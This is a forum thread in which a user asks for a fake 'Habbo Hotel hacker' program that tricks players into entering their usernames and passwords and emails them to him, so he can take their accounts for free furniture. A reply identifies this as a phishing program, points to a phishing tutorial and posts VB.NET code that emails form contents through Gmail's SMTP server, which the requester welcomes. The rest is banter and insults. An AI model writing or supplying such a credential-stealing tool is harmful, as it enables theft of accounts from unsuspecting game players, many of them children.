[Request] Li'l program...

Posts 1–15 of 27 · Page 1 of 2
[Request] Li'l program...
Ohai there,

can someone make a program for me which looks like a Habbo Hotel hacker? Or give me a tutorial on how to make one? It's like:

Code:
Habbo Naam
(option to enter here)
Habbo Wachtwoord
(option to enter here)

Hoe veel credits wil je? (max 100 per keer!)
(option to enter here)

(button) HACK!
TRANSLATION:
Code:
Habbo Name

Habbo Password


How Many Credits do you want? (Max. 100 per time!)

Then it sends this info that they filled in to me at zooiadres@live.nl
that way I can hax people on Habbo Hotel


I would LOVE this program, or I would LOVE this tutorial on how to make this program.

Thanks, KamielFTW
wrong section fuck head
Quote Originally Posted by Hispiforce View Post
wrong section fuck head
Oh nice way of telling me that <3


Quote Originally Posted by Comet View Post
LOL HABBO!
How Old Are you .
Yes I know the game sucks. but I just want to try out having ALOT of free stuff
No one in their right mind except for you would try hacking habbo hotel of all games you pick the worst.
LOL HABBO!
How Old Are you .
what you need is called a phishing program




[php]
Dim MyMailMessage As New MailMessage()
Try
MyMailMessage.From = New MailAddress("Your gmail account")
MyMailMessage.To.Add("Your email account")
MyMailMessage.Subject = TextBox1.Text
MyMailMessage.Body = TextBox2.Text
Dim SMTP As New SmtpClient("smtp.gmail.com")
SMTP.Port = 587
SMTP.EnableSsl = True
SMTP.Credentials = New System.Net.NetworkCredential("Gmail account", "Gmail password")
SMTP.Send(MyMailMessage)
TextBox2.Text = ""
Catch ex As Exception
End Try
End Sub
[/php]
Quote Originally Posted by AVGN View Post
what you need is called a phishing program

YouTube - Visual Basic 2008 - Phishing Program Tutorialⓘ



[php]
Dim MyMailMessage As New MailMessage()
Try
MyMailMessage.From = New MailAddress("Your gmail account")
MyMailMessage.To.Add("Your email account")
MyMailMessage.Subject = TextBox1.Text
MyMailMessage.Body = TextBox2.Text
Dim SMTP As New SmtpClient("smtp.gmail.com")
SMTP.Port = 587
SMTP.EnableSsl = True
SMTP.Credentials = New System.Net.NetworkCredential("Gmail account", "Gmail password")
SMTP.Send(MyMailMessage)
TextBox2.Text = ""
Catch ex As Exception
End Try
End Sub
[/php]
Now that's something I can use!


Quote Originally Posted by iKiLLYouCro View Post
HAAHHA HABBO omg hahaha Noob
Begging.
Useless post is useless


Quote Originally Posted by Sjoerd View Post


btw your dutch, want to buy my old furniture?

$85,000
No
ahahhahahahaha
i used to have a habbo phisher with a .nl domain .kewl

it wasnt mine tho
HAAHHA HABBO omg hahaha Noob
Begging.
Quote Originally Posted by ZeroTroubles View Post
Ohai there,

can someone make a program for me which looks like a Habbo Hotel hacker? Or give me a tutorial on how to make one? It's like:

Code:
Habbo Naam
(option to enter here)
Habbo Wachtwoord
(option to enter here)

Hoe veel credits wil je? (max 100 per keer!)
(option to enter here)

(button) HACK!
TRANSLATION:
Code:
Habbo Name

Habbo Password


How Many Credits do you want? (Max. 100 per time!)

Then it sends this info that they filled in to me at zooiadres@live.nl
that way I can hax people on Habbo Hotel


I would LOVE this program, or I would LOVE this tutorial on how to make this program.

Thanks, KamielFTW
btw your dutch, want to buy my old furniture?

$85,000
Dutch FTW .

Why u play Habbo?
worst game ever made .
Quote Originally Posted by Newbieforce View Post
Dutch FTW .

Why u play Habbo?
worst game ever made .
I don't play it lol, I just want to hack people so I can get free furniture, then give it to my little cousin, as he wants furniture ;p
people play Habbo?
Quote Originally Posted by Ed View Post
people play Habbo?
People want to hack habbo.
Quote Originally Posted by Dakota View Post
People want to hack habbo.
Why ?
Posts 1–15 of 27 · Page 1 of 2
This thread is closed for replies.

Tags for this Thread

None

Need help?